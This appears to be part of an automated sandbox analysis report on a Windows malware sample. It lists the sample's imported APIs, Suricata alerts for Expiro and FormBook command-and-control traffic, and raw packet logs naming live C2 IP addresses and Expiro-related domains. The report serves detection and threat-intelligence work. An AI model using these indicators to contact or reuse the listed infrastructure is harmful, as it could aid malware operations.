AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T08:31:42.841913+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	49705	18.141.10.107	80	TCP
2024-12-09T08:31:43.820628+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.7	49706	TCP
2024-12-09T08:31:43.820628+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.7	49706	TCP
2024-12-09T08:31:47.049148+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.7	49707	TCP
2024-12-09T08:31:47.049148+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.7	49707	TCP
2024-12-09T08:31:51.722646+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.7	55926	1.1.1.1	53	UDP
2024-12-09T08:31:51.782086+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.7	49709	TCP
2024-12-09T08:31:51.782086+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.7	49709	TCP
2024-12-09T08:32:00.400791+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.7	55011	1.1.1.1	53	UDP
2024-12-09T08:32:39.722151+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49722	217.70.184.50	80	TCP
2024-12-09T08:32:48.923482+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	49720	82.112.184.197	80	TCP
2024-12-09T08:32:56.947433+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49735	154.23.184.207	80	TCP
2024-12-09T08:32:59.612568+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49741	154.23.184.207	80	TCP
2024-12-09T08:33:02.268891+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49747	154.23.184.207	80	TCP
2024-12-09T08:33:04.952823+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49753	154.23.184.207	80	TCP
2024-12-09T08:33:12.398406+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49774	38.165.29.234	80	TCP
2024-12-09T08:33:15.082147+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49781	38.165.29.234	80	TCP
2024-12-09T08:33:17.769352+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49787	38.165.29.234	80	TCP
2024-12-09T08:33:21.001094+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49793	38.165.29.234	80	TCP
2024-12-09T08:33:27.762203+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49813	13.248.169.48	80	TCP
2024-12-09T08:33:30.438993+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49820	13.248.169.48	80	TCP
2024-12-09T08:33:33.198157+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49826	13.248.169.48	80	TCP
2024-12-09T08:33:36.031248+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49833	13.248.169.48	80	TCP
2024-12-09T08:33:37.375955+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.7	49837	TCP
2024-12-09T08:33:37.375955+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.7	49837	TCP
2024-12-09T08:33:40.161940+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.7	49844	TCP
2024-12-09T08:33:40.161940+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.7	49844	TCP
2024-12-09T08:33:43.193931+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49852	156.251.17.224	80	TCP
2024-12-09T08:33:47.285549+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49865	156.251.17.224	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 08:31:40.144814968 CET	49704	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:40.264324903 CET	80	49704	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:40.264421940 CET	49704	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:40.299113989 CET	49704	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:40.299176931 CET	49704	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:40.418941975 CET	80	49704	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:40.418962955 CET	80	49704	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:41.614429951 CET	80	49704	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:41.614525080 CET	80	49704	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:41.614603043 CET	49704	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:41.615576029 CET	49704	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:41.734776974 CET	80	49704	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:42.194926023 CET	49705	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:42.222265005 CET	49706	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:42.314371109 CET	80	49705	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:42.317981958 CET	49705	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:42.342973948 CET	80	49706	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:42.344731092 CET	49706	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:42.358186007 CET	49705	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:42.358269930 CET	49705	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:42.358412027 CET	49706	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:42.358468056 CET	49706	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:42.477546930 CET	80	49705	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:42.477562904 CET	80	49705	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:42.477703094 CET	80	49706	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:42.477713108 CET	80	49706	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:42.841912985 CET	49705	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:43.700547934 CET	80	49706	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:43.700591087 CET	80	49706	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:43.700721025 CET	49706	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:43.701277971 CET	49706	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:43.820627928 CET	80	49706	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:44.616206884 CET	49707	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:44.735572100 CET	80	49707	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:44.735637903 CET	49707	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:44.739836931 CET	49707	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:44.739856958 CET	49707	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:44.859174967 CET	80	49707	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:44.859189034 CET	80	49707	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:46.800705910 CET	80	49707	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:46.800734043 CET	80	49707	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:46.800806046 CET	49707	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:46.825609922 CET	49707	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:31:47.049148083 CET	80	49707	18.141.10.107	192.168.2.7
Dec 9, 2024 08:31:48.300734043 CET	49708	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:48.420073032 CET	80	49708	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:48.420185089 CET	49708	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:48.420357943 CET	49708	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:48.420357943 CET	49708	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:48.539602995 CET	80	49708	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:48.539616108 CET	80	49708	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:49.770889997 CET	80	49708	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:49.770915031 CET	80	49708	54.244.188.177	192.168.2.7
Dec 9, 2024 08:31:49.770977020 CET	49708	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:49.771068096 CET	49708	80	192.168.2.7	54.244.188.177
Dec 9, 2024 08:31:49.890273094 CET	80	49708	54.244.188.177	192.168.2.7
Dec 9, 2024 08:32:01.053976059 CET	49718	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:32:01.173389912 CET	80	49718	18.141.10.107	192.168.2.7
Dec 9, 2024 08:32:01.173990965 CET	49718	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:32:01.175236940 CET	49718	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:32:01.175236940 CET	49718	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:32:01.294523001 CET	80	49718	18.141.10.107	192.168.2.7
Dec 9, 2024 08:32:01.294538021 CET	80	49718	18.141.10.107	192.168.2.7
Dec 9, 2024 08:32:03.207288027 CET	80	49718	18.141.10.107	192.168.2.7
Dec 9, 2024 08:32:03.207391024 CET	80	49718	18.141.10.107	192.168.2.7
Dec 9, 2024 08:32:03.207477093 CET	49718	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:32:03.207770109 CET	49718	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:32:03.326916933 CET	80	49718	18.141.10.107	192.168.2.7
Dec 9, 2024 08:32:38.347681999 CET	49722	80	192.168.2.7	217.70.184.50
Dec 9, 2024 08:32:38.467055082 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:38.467143059 CET	49722	80	192.168.2.7	217.70.184.50
Dec 9, 2024 08:32:38.480850935 CET	49722	80	192.168.2.7	217.70.184.50
Dec 9, 2024 08:32:38.600145102 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:39.721884012 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:39.722048044 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:39.722059965 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:39.722151041 CET	49722	80	192.168.2.7	217.70.184.50
Dec 9, 2024 08:32:39.722976923 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:39.723028898 CET	49722	80	192.168.2.7	217.70.184.50
Dec 9, 2024 08:32:39.783660889 CET	49722	80	192.168.2.7	217.70.184.50
Dec 9, 2024 08:32:39.904103041 CET	80	49722	217.70.184.50	192.168.2.7
Dec 9, 2024 08:32:55.298798084 CET	49735	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:55.418049097 CET	80	49735	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:55.418132067 CET	49735	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:55.440675974 CET	49735	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:55.559952021 CET	80	49735	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:56.947251081 CET	80	49735	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:56.947372913 CET	80	49735	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:56.947432995 CET	49735	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:56.956296921 CET	49735	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:57.974914074 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:58.094176054 CET	80	49741	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:58.094271898 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:58.109345913 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:58.228816032 CET	80	49741	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:59.612567902 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:59.630390882 CET	80	49741	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:59.630445004 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:59.630516052 CET	80	49741	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:59.630564928 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:32:59.732279062 CET	80	49741	154.23.184.207	192.168.2.7
Dec 9, 2024 08:32:59.732331038 CET	49741	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:00.631737947 CET	49747	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:00.751030922 CET	80	49747	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:00.751122952 CET	49747	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:00.766001940 CET	49747	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:00.885658026 CET	80	49747	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:00.885713100 CET	80	49747	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:02.268891096 CET	49747	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:02.388498068 CET	80	49747	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:02.388561010 CET	49747	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:03.287523985 CET	49753	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:03.406832933 CET	80	49753	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:03.407068014 CET	49753	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:03.422480106 CET	49753	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:03.542632103 CET	80	49753	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:04.952549934 CET	80	49753	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:04.952653885 CET	80	49753	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:04.952822924 CET	49753	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:04.955790043 CET	49753	80	192.168.2.7	154.23.184.207
Dec 9, 2024 08:33:05.075467110 CET	80	49753	154.23.184.207	192.168.2.7
Dec 9, 2024 08:33:10.745676994 CET	49774	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:10.865279913 CET	80	49774	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:10.865356922 CET	49774	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:10.879636049 CET	49774	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:10.998950005 CET	80	49774	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:12.398406029 CET	49774	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:12.518085957 CET	80	49774	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:12.518136978 CET	49774	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:13.442301035 CET	49781	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:13.561600924 CET	80	49781	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:13.561701059 CET	49781	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:13.576628923 CET	49781	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:13.696708918 CET	80	49781	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:15.082146883 CET	49781	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:15.201570988 CET	80	49781	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:15.203742027 CET	49781	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:16.127859116 CET	49787	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:16.247345924 CET	80	49787	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:16.247421980 CET	49787	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:16.262901068 CET	49787	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:16.382402897 CET	80	49787	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:16.382427931 CET	80	49787	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:17.769351959 CET	49787	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:17.889033079 CET	80	49787	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:17.889087915 CET	49787	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:18.962379932 CET	49793	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:19.081717014 CET	80	49793	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:19.084290981 CET	49793	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:19.121292114 CET	49793	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:19.307404041 CET	80	49793	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:21.000924110 CET	80	49793	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:21.000977993 CET	80	49793	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:21.001094103 CET	49793	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:21.003957987 CET	49793	80	192.168.2.7	38.165.29.234
Dec 9, 2024 08:33:21.123198032 CET	80	49793	38.165.29.234	192.168.2.7
Dec 9, 2024 08:33:26.542510033 CET	49813	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:26.661931038 CET	80	49813	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:26.662014008 CET	49813	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:26.687251091 CET	49813	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:26.806612968 CET	80	49813	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:27.761787891 CET	80	49813	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:27.761956930 CET	80	49813	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:27.762202978 CET	49813	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:28.191359997 CET	49813	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:29.219882965 CET	49820	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:29.339569092 CET	80	49820	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:29.339792967 CET	49820	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:29.432353020 CET	49820	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:29.551588058 CET	80	49820	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:30.438803911 CET	80	49820	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:30.438930035 CET	80	49820	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:30.438992977 CET	49820	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:30.941185951 CET	49820	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:31.966738939 CET	49826	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:32.086633921 CET	80	49826	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:32.088783026 CET	49826	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:32.217272043 CET	49826	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:32.336508036 CET	80	49826	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:32.336616039 CET	80	49826	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:33.186393976 CET	80	49826	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:33.194412947 CET	80	49826	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:33.198157072 CET	49826	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:33.722485065 CET	49826	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:34.811151981 CET	49833	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:34.930412054 CET	80	49833	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:34.930507898 CET	49833	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:35.062782049 CET	49833	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:35.182060003 CET	80	49833	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:36.030951023 CET	80	49833	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:36.031095982 CET	80	49833	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:36.031248093 CET	49833	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:36.036645889 CET	49833	80	192.168.2.7	13.248.169.48
Dec 9, 2024 08:33:36.155915976 CET	80	49833	13.248.169.48	192.168.2.7
Dec 9, 2024 08:33:41.570846081 CET	49852	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:41.690174103 CET	80	49852	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:41.690252066 CET	49852	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:41.707206964 CET	49852	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:41.826498985 CET	80	49852	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:42.411303043 CET	49857	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:33:42.530536890 CET	80	49857	18.141.10.107	192.168.2.7
Dec 9, 2024 08:33:42.532876968 CET	49857	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:33:42.533005953 CET	49857	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:33:42.533005953 CET	49857	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:33:42.824950933 CET	80	49857	18.141.10.107	192.168.2.7
Dec 9, 2024 08:33:42.824966908 CET	80	49857	18.141.10.107	192.168.2.7
Dec 9, 2024 08:33:43.193639994 CET	80	49852	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:43.193855047 CET	80	49852	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:43.193931103 CET	49852	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:44.568409920 CET	80	49857	18.141.10.107	192.168.2.7
Dec 9, 2024 08:33:44.568500996 CET	80	49857	18.141.10.107	192.168.2.7
Dec 9, 2024 08:33:44.568567991 CET	49857	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:33:44.568670988 CET	49857	80	192.168.2.7	18.141.10.107
Dec 9, 2024 08:33:44.628895044 CET	49852	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:44.688004971 CET	80	49857	18.141.10.107	192.168.2.7
Dec 9, 2024 08:33:45.647500992 CET	49865	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:45.766844034 CET	80	49865	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:45.767119884 CET	49865	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:45.782782078 CET	49865	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:45.902163982 CET	80	49865	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:47.284848928 CET	80	49865	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:47.285063982 CET	80	49865	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:47.285548925 CET	49865	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:47.285548925 CET	49865	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:47.535677910 CET	80	49865	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:47.536258936 CET	49865	80	192.168.2.7	156.251.17.224
Dec 9, 2024 08:33:47.907763004 CET	80	49865	156.251.17.224	192.168.2.7
Dec 9, 2024 08:33:47.907861948 CET	49865	80	192.168.2.7	156.251.17.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 08:31:38.396184921 CET	59846	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:31:38.960129976 CET	53	59846	1.1.1.1	192.168.2.7
Dec 9, 2024 08:31:41.623745918 CET	51772	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:31:42.000174046 CET	60725	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:31:42.137850046 CET	53	60725	1.1.1.1	192.168.2.7
Dec 9, 2024 08:31:42.175689936 CET	53	51772	1.1.1.1	192.168.2.7
Dec 9, 2024 08:31:43.790455103 CET	50865	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:31:43.928740025 CET	53	50865	1.1.1.1	192.168.2.7
Dec 9, 2024 08:32:00.395513058 CET	53	57019	1.1.1.1	192.168.2.7
Dec 9, 2024 08:32:03.739913940 CET	53	49585	1.1.1.1	192.168.2.7
Dec 9, 2024 08:32:03.954391956 CET	53	63628	1.1.1.1	192.168.2.7
